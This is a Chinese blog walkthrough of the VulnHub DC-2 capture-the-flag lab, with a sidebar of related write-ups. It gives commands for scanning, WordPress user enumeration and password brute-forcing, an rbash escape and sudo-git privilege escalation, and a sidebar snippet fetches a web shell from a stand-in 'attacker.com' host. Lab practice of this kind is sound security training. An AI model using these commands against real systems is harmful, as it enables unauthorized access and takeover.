DC-2打靶渗透

最新推荐文章于 2024-08-30 17:32:44 发布
最新推荐文章于 2024-08-30 17:32:44 发布
阅读量373 收藏 10
点赞数 5
文章标签: linux 网络 运维 服务器 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65112983/article/details/141198683
版权

一、信息收集

1、查看靶机的MAC地址:

2、查看靶机的ip地址:

nmap 192.168.7.0/24

3、查看靶机开放的端口,开放了80和7744端口,发现80端口下面有提示http://dc-2/,怀疑需要配置hosts文件来解析:

nmap -p- -sC -sT -sV -A 192.168.7.57

4、访问靶机的80端口,发现确实需要修改:

5、修改hosts文件:

6、再次访问80端口:

7、查看页面发现有一个flag,点开之后里面有一个提示需要用到cewl:

8、先对网站进行目录扫描,查找有效信息:

dirsearch -u "http://dc-2"

9、拼接访问目录,查看网页,找到登录页面:

10、使用前面找到的cewl来生成一个字典:

cewl http://dc-2 -w passwd.txt


11、使用wpscan工具枚举用户名:

wpscan --url http://dc-2/ --enumerate u

12、使用用户名字典和密码字典进行爆破:

wpscan --url http://dc-2/ -U user.txt -P passwd.txt

jerry / adipiscing

tom / parturient

13、使用得到的账号和密码进行登录:

14、在pages里面找到了flag2,提示我们换一种思路:

15、之前端口扫描的时候发现ssh服务在7744端口,我们尝试进行ssh连接:

ssh tom@192.168.7.57 -p 7744

发现只有tom用户可以,jerry用户不行

16、查看用户权限发现权限有限,并且有限制'-rbash',可以明显看出来是rbash逃逸:

17、使用命令进行逃逸并查看flag.txt:

BASH_CMDS[a]=/bin/bash

a

export PATH=$PATH:/bin/

export PATH=$PATH:/usr/bin

18、flag3.txt提示我们需要切换jerry用户,使用前面的账号和密码进行切换:

19、在用户下发现了第四个flag:

二、提权:

1、查看用户权限:

2、使用命令进行提权:

sudo git -p help config

!/bin/sh

3、在root下面找到第五个flag:

搬砖小星
关注
  • 5
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【技术分享】实战dc-3靶场及其技巧讲解
军火库
07-22 300
本期技术文章将与大家分享小星实战“dc-3靶场”的经验,通过分析其渗透过程以及不同的getshell方法,与大家共同探讨该靶场的破解技巧。
【VulnHub靶机渗透】七:DC-4
野原新之助
04-29 703
该靶机设定Web登录界面的弱口令漏洞,以及站点存在命令执行,和sudo的不安全配置问题。VulnHub是一个安全平台,内含众多渗透测试的靶场镜像,只需要下载至本地并在虚拟机上运行,即可得到一个完整的渗透测试练习系统,每一个靶机都有相关目标去完成(万分感谢提供靶机镜像的同学)。
VulnHub靶机 DC-5 打靶 渗透测试详细过程
rumil的博客
04-18 1115
在访问/footer.php,/thankyou.php时发现跳转界面和原始界面的年份不一样,总是来回变动,刷新也会变动。目录爆破发现,存在file参数,尝试读取一下/etc/passwd文件,成功读取/etc/passwd文件并回显成功。当然既然知道了包含/footer.php文件,那么我们也可以去猜解参数,常用的如file,尝试一下即可,或者爆破。暴露出如下几个目录,去访问发现其中的目录,爆出的目录其中有一些界面为默认界面当中点击跳转的目录。给予sh文件执行权限,直接执行一下试试,成功提权。
VulnHub靶机 DC-7 打靶 渗透详细流程
rumil的博客
04-22 1005
主机发现—端口扫描—目录爆破发现后台—服务探测—白盒测试(源码当中找配置文件)—ssh远程登录—邮件信息—找到备份文件脚本—发现脚本当中的drush命令—修改后台密码—进入后台—寻找可代码执行或getshell地方—drupal8不允许执行命令(模块)—下载新的插件—getshell—反弹shell—追加反弹命令—提权即可。由于我们上一步骤已经得到了backups.sh脚本属主为root,属组为www-data,所以我们将反弹shell命令添加到脚本当中,等待执行脚本反弹shell即可得到root权限。
VulnHub靶机 DC-8 打靶实战 详细渗透过程
rumil的博客
04-24 1474
主机发现—端口扫描—服务探针—指纹识别—发现注入点—web渗透SQL注入—获取用户名密码—登入后台—发现可加载PHP代码输入PHP代码—反弹shell—提权—exim4漏洞利用。将其拷贝到本地,发现靶机有wget命令,那么可以通过wget进行下载,本地通过python开启一个http服务。访问web界面,通过上述信息收集加插件,得到以下信息,采用Drupal CMS,版本为Drupal 7。找到可代码执行的地方,或者可以输入代码的地方,尝试输入,保存即可。查看数据库当中的表信息,还有表中的内容。
DC-6 打靶渗透
m0_65112983的博客
08-12 902
DC-6打靶渗透
Vulntarget-a打靶记录
qu_xiao_lei的博客
01-26 558
由于微软在进行AES加密运算过程中,使用了AES-CFB8模式并且错误的将IV设置为全零,这使得攻击者在明文(client chanllenge)、IV等要素可控的情况下,存在较高概率使得产生的密文为全零。这里的原理是:在win2016中上传木马,该木马是将2016的shell反弹至win7中的1111端口,win7中需要用端口转发工具lcx将1111端口中的shell转发至kali的2222端口,这样在kali中监听2222端口就拿到了win2016的shell。
wpscan渗透wordpress靶机——dc6
网络设备配置-华为
09-22 1163
wordpress: wpscan: 实验环境:kali linux和靶机环境 dc6靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip 下载后,直接在vm打开即可。 注意要使kali和靶机同处一个网段之中,我这里都在VM中搭建NAT模式。 信息收集 靶机打后是这样的: 这个时候出于需求目的,我们需要探测目标主机的ip、操作系统和版本以及其他服务的版本号。kali中集成了很多信息收集的工具,我这里仅用最常使用的 NMAP。 一、勘测目标主机ip地址和开放端口及服
打靶练习之--LazysysAdmin靶机
qq_34094920的博客
12-12 1053
渗透机IP:192.168.1.108目标靶机IP:192.168.1.106任务通过渗透机进入目标主机 获取flag。
Linux高性能服务器编程 总结索引 | 第2章:IP协议详解
AsherGu的博客
08-29 1218
IP服务的特点;IPv4头部结构;IP分片;IP路由:IP模块工作流程,路由机制,路由表更新;IP转发;重定向;IPv6头部结构:IPv6固定头部结构,IPv6扩展头部
Linux 常用命令 - lsblk 【查看磁盘(块设备)使用情况】
随便转转
08-27 1294
lsblk源自于 “list block devices” 的缩写。这个命令用于列出系统中的所有块设备(block devices),比如硬盘、光驱等。它展示块设备的层次结构、大小和挂载点等信息,非常有助于系统管理员理解系统存储结构。
LinuxLinux Bash Shell 教程
Young_Pro的博客
08-27 1607
Linux bash(Bourne-Again SHell)是一种为GNU操作系统编写的命令行解释器,它是大多数Linux发行版中最常用的shell。Bash提供了一种强大的方式来控制和管理操作系统,支持命令历史记录、别名、管道、重定向、变量、条件判断、循环以及自定义脚本编写等功能,使得用户能够通过简单的命令行指令执行复杂的任务,是系统管理员和开发人员日常工作中的得力工具。
linux 中如何将.c 文件转换为可执行文件
千千道的博客
08-29 1739
Linux 环境下进行 C 语言编程时,将.c文件转换为可执行文件是一个关键的步骤。这个过程涉及到使用编译器和一些相关的工具,本文将详细介绍在 Linux 系统中如何将.c文件转换为可执行文件的方法。
Linux中杀死占用某个端口的进程
靖妖傩舞
08-28 693
选项表示强制终止进程,但这种方式可能会导致数据丢失或其他不良后果,所以在使用时要谨慎。确定要杀死的进程 PID。从上述步骤中获取到占用端口 9997 的进程 PID。
Linux 命令行快捷键
sun007700的专栏
08-30 603
涉及在linux命令行下进行快速移动光标、命令编辑、编辑后执行历史命令、Bang(!Ctrl+y: 粘贴Ctrl+u或ctrl+k剪切的内容。Alt – d :由光标位置开始,往右删除单词。Alt – d: 先按住 Alt 键,然后再按 d 键;Ctrl+u:删除当前光标前面的文字 (还有剪切功能)Ctrl+k:删除当前光标后面的文字 (还有剪切功能)M – k:先单击 Esc 键,然后再按 k 键。Ctrl+w: 删除光标前面的单词。Ctrl+左右键:在单词之间跳转。Ctrl+a: 跳到本行的行首。
linux查找mysql日志
最新发布
爱思考的People
08-30 539
MySQL的日志文件通常存储在数据库服务器的数据目录下,具体位置取决于MySQL的配置文件。# 查找MySQL配置文件# 查找MySQL日志文件。
Linux下IO多路复用—select,poll,epoll
热土程序园,利他愉己~
08-29 1439
Linux下IO多路复用—select,poll,epoll IO多路复用是一种操作系统的技术,用于在单个线程或进程中管理多个输入输出操作。它的主要目的是通过将多个IO操作合并到一个系统调用中来提高系统的性能和资源利用率,避免了传统的多线程或多进程模型中因为阻塞IO而导致的资源浪费和低效率问题。 在IO多路复用中,通常使用的系统调用有 select()、poll()、epoll() 等,它们允许程序等待多个文件描述符(sockets、文件句柄等)中的任何一个变为可读或可写,然后再进行实际的IO操作。
虚拟机Linux(Centos7)系统静态IP设置
BQ Blog
08-30 1187
这篇博客介绍了在虚拟机中配置Linux系统的静态IP地址的方法,适用于通过DHCP获取IP地址导致频繁更换IP的情况。首先,用户需要将虚拟机的网络模式更改为NAT模式,并在虚拟机网络编辑器中记录子网IP、子网掩码和网关。然后,编辑相应的网络配置文件,将网络协议更改为静态,并手动设置静态IP地址、子网掩码、网关和DNS。最后,重启网络服务并验证配置是否生效。
DC-5靶场渗透过程中,怎样挂载木马文件
06-02
DC-5 靶场渗透过程中,如果要挂载木马文件,可以按照以下步骤进行操作: 1. 找到可写入的目录:可以使用 `ls -al` 命令查看目录权限,找到可写入的目录。通常会有一些临时目录或者上传目录是可写入的。 2. 上传木马文件:将自己准备好的木马文件上传到可写入的目录中。可以使用 `curl` 或者 `wget` 命令进行上传,例如: ``` curl -o shell.php http://attacker.com/shell.php ``` 上述命令会将 `shell.php` 文件下载到本地,并保存到当前目录下。 3. 运行木马文件:在浏览器中访问上传的木马文件,例如 `http://dc5/wordpress/wp-content/plugins/akismet/views/akismet.php`。如果一切正常,就可以获得一个远程 shell,并在目标系统中执行任意命令了。 需要注意的是,这种做法是违法的,仅用于学习和研究目的,切勿在未授权的情况下对他人的系统进行攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值